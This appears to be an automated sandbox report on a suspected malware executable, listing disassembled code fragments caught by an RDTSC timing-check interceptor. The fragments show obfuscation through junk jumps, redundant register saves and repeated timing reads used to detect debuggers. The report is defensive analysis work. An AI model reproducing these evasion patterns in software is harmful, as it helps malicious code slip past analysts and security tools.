Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0189 second address: 73B0252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, EDh 0x00000005 call 00007F262D38FB12h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [756006ECh] 0x00000014 jmp 00007F262D38FB11h 0x00000019 test esi, esi 0x0000001b jmp 00007F262D38FB0Eh 0x00000020 jne 00007F262D3908EEh 0x00000026 jmp 00007F262D38FB10h 0x0000002b xchg eax, edi 0x0000002c pushad 0x0000002d mov edi, eax 0x0000002f jmp 00007F262D38FB0Ah 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007F262D38FB0Bh 0x0000003b xchg eax, edi 0x0000003c jmp 00007F262D38FB16h 0x00000041 call dword ptr [755D0B60h] 0x00000047 mov eax, 7696E5E0h 0x0000004c ret 0x0000004d pushad 0x0000004e push eax 0x0000004f mov eax, edi 0x00000051 pop edx 0x00000052 movzx esi, bx 0x00000055 popad 0x00000056 push 00000044h 0x00000058 jmp 00007F262D38FB11h 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F262D38FB18h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0252 second address: 73B0261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0261 second address: 73B0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0267 second address: 73B026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B026B second address: 73B026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B026F second address: 73B028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F262CBE4E93h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B028D second address: 73B031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007F262D38FB0Eh 0x00000011 push dword ptr [eax] 0x00000013 jmp 00007F262D38FB10h 0x00000018 mov eax, dword ptr fs:[00000030h] 0x0000001e pushad 0x0000001f mov eax, 04FAAD6Dh 0x00000024 movzx ecx, di 0x00000027 popad 0x00000028 push dword ptr [eax+18h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F262D38FB0Eh 0x00000034 sub eax, 174F2A38h 0x0000003a jmp 00007F262D38FB0Bh 0x0000003f popfd 0x00000040 jmp 00007F262D38FB18h 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B035A second address: 73B03BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F262CBE4E93h 0x0000000b and ah, 0000006Eh 0x0000000e jmp 00007F262CBE4E99h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, eax 0x00000019 jmp 00007F262CBE4E8Eh 0x0000001e test esi, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F262CBE4E97h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B03BE second address: 73B045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F269B55EDD3h 0x0000000f jmp 00007F262D38FB0Eh 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 mov eax, edi 0x00000019 jmp 00007F262D38FB13h 0x0000001e popad 0x0000001f mov dword ptr [esi], edi 0x00000021 pushad 0x00000022 movzx ecx, di 0x00000025 pushfd 0x00000026 jmp 00007F262D38FB11h 0x0000002b adc ax, E276h 0x00000030 jmp 00007F262D38FB11h 0x00000035 popfd 0x00000036 popad 0x00000037 mov dword ptr [esi+04h], eax 0x0000003a jmp 00007F262D38FB0Eh 0x0000003f mov dword ptr [esi+08h], eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F262D38FB0Ah 0x0000004b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B045A second address: 73B0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0460 second address: 73B04A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F262D38FB0Dh 0x00000015 sbb ecx, 3B8917E6h 0x0000001b jmp 00007F262D38FB11h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04A0 second address: 73B04A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04A5 second address: 73B04E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F262D38FB16h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop eax 0x00000019 mov edx, 6CC5AE2Ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04E7 second address: 73B04ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B04ED second address: 73B052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b jmp 00007F262D38FB18h 0x00000010 mov dword ptr [esi+14h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F262D38FB17h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B052C second address: 73B0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0544 second address: 73B05B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e jmp 00007F262D38FB16h 0x00000013 mov dword ptr [esi+18h], eax 0x00000016 pushad 0x00000017 mov dl, cl 0x00000019 pushfd 0x0000001a jmp 00007F262D38FB13h 0x0000001f add si, 32AEh 0x00000024 jmp 00007F262D38FB19h 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+58h] 0x0000002e pushad 0x0000002f mov eax, 13D793D3h 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B05B4 second address: 73B05F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esi+1Ch], eax 0x00000009 pushad 0x0000000a mov ecx, 0F533C7Dh 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 jmp 00007F262CBE4E95h 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+5Ch] 0x0000001d jmp 00007F262CBE4E8Eh 0x00000022 mov dword ptr [esi+20h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B05F8 second address: 73B05FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B05FC second address: 73B0600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0600 second address: 73B0606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0606 second address: 73B062F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F262CBE4E8Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B062F second address: 73B0633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0633 second address: 73B0639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0639 second address: 73B0660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F262D38FB17h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0660 second address: 73B067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B067D second address: 73B068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B068D second address: 73B06A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06A7 second address: 73B06AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06AD second address: 73B06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06B3 second address: 73B06B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06B7 second address: 73B06BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B06BB second address: 73B0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b jmp 00007F262D38FB10h 0x00000010 mov eax, dword ptr [ebx+68h] 0x00000013 pushad 0x00000014 mov edx, ecx 0x00000016 pushfd 0x00000017 jmp 00007F262D38FB0Ah 0x0000001c or eax, 4C5C07F8h 0x00000022 jmp 00007F262D38FB0Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esi+2Ch], eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov eax, 1A2FE441h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0705 second address: 73B07D4 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F262CBE4E93h 0x0000000d sbb ax, E86Eh 0x00000012 jmp 00007F262CBE4E99h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ax, word ptr [ebx+6Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F262CBE4E8Ch 0x00000024 jmp 00007F262CBE4E95h 0x00000029 popfd 0x0000002a mov dl, ch 0x0000002c popad 0x0000002d mov word ptr [esi+30h], ax 0x00000031 jmp 00007F262CBE4E93h 0x00000036 mov ax, word ptr [ebx+00000088h] 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F262CBE4E8Bh 0x00000044 sub ax, 608Eh 0x00000049 jmp 00007F262CBE4E99h 0x0000004e popfd 0x0000004f popad 0x00000050 mov word ptr [esi+32h], ax 0x00000054 jmp 00007F262CBE4E8Eh 0x00000059 mov eax, dword ptr [ebx+0000008Ch] 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B07D4 second address: 73B07DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B07DA second address: 73B07FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bx, 23FEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B07FC second address: 73B08AD instructions: 0x00000000 rdtsc 0x00000002 call 00007F262D38FB0Fh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+18h] 0x0000000e jmp 00007F262D38FB0Fh 0x00000013 mov dword ptr [esi+38h], eax 0x00000016 jmp 00007F262D38FB16h 0x0000001b mov eax, dword ptr [ebx+1Ch] 0x0000001e jmp 00007F262D38FB10h 0x00000023 mov dword ptr [esi+3Ch], eax 0x00000026 jmp 00007F262D38FB10h 0x0000002b mov eax, dword ptr [ebx+20h] 0x0000002e jmp 00007F262D38FB10h 0x00000033 mov dword ptr [esi+40h], eax 0x00000036 pushad 0x00000037 mov ebx, esi 0x00000039 popad 0x0000003a lea eax, dword ptr [ebx+00000080h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 pushfd 0x00000046 jmp 00007F262D38FB0Eh 0x0000004b jmp 00007F262D38FB15h 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B08AD second address: 73B08D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F262CBE4E8Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B08D3 second address: 73B08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B08EF second address: 73B0926 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 35917387h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F262CBE4E8Dh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F262CBE4E98h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0926 second address: 73B092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B092A second address: 73B0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0930 second address: 73B0963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov esi, 4D60009Dh 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 push ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F262D38FB11h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0963 second address: 73B0980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0980 second address: 73B0988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0988 second address: 73B098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B09A2 second address: 73B09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B09A8 second address: 73B0A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F262CBE4E8Ah 0x00000009 and si, 19E8h 0x0000000e jmp 00007F262CBE4E8Bh 0x00000013 popfd 0x00000014 call 00007F262CBE4E98h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov edi, eax 0x0000001f pushad 0x00000020 mov di, 2692h 0x00000024 mov bx, 19DEh 0x00000028 popad 0x00000029 test edi, edi 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F262CBE4E91h 0x00000034 add esi, 5F520966h 0x0000003a jmp 00007F262CBE4E91h 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A1E second address: 73B0A33 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ah, bh 0x00000009 popad 0x0000000a js 00007F269B55E7A1h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A33 second address: 73B0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E97h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A4F second address: 73B0A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1F75D381h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, bx 0x00000014 pushfd 0x00000015 jmp 00007F262D38FB15h 0x0000001a adc eax, 3B9B1586h 0x00000020 jmp 00007F262D38FB11h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0A92 second address: 73B0ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F262CBE4E92h 0x00000013 lea eax, dword ptr [ebx+78h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0ABB second address: 73B0ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0ABF second address: 73B0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0ADC second address: 73B0AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0AE1 second address: 73B0B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F262CBE4E8Dh 0x0000000a sub esi, 6825D1A6h 0x00000010 jmp 00007F262CBE4E91h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F262CBE4E8Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0B1F second address: 73B0B6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F262D38FB0Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F262D38FB0Ch 0x00000019 jmp 00007F262D38FB15h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0B6D second address: 73B0B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F262CBE4E90h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0B9D second address: 73B0BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0BA3 second address: 73B0BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F262CBE4E97h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0BD1 second address: 73B0BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F262D38FB0Ah 0x0000000f mov dword ptr [esp], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F262D38FB0Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0BF6 second address: 73B0C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0C05 second address: 73B0C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0C25 second address: 73B0C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F262CBE4E8Bh 0x00000014 or ch, 0000002Eh 0x00000017 jmp 00007F262CBE4E99h 0x0000001c popfd 0x0000001d mov cx, DDB7h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0C67 second address: 73B0CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F262D38FB19h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f pushad 0x00000010 call 00007F262D38FB0Ch 0x00000015 movzx eax, di 0x00000018 pop ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
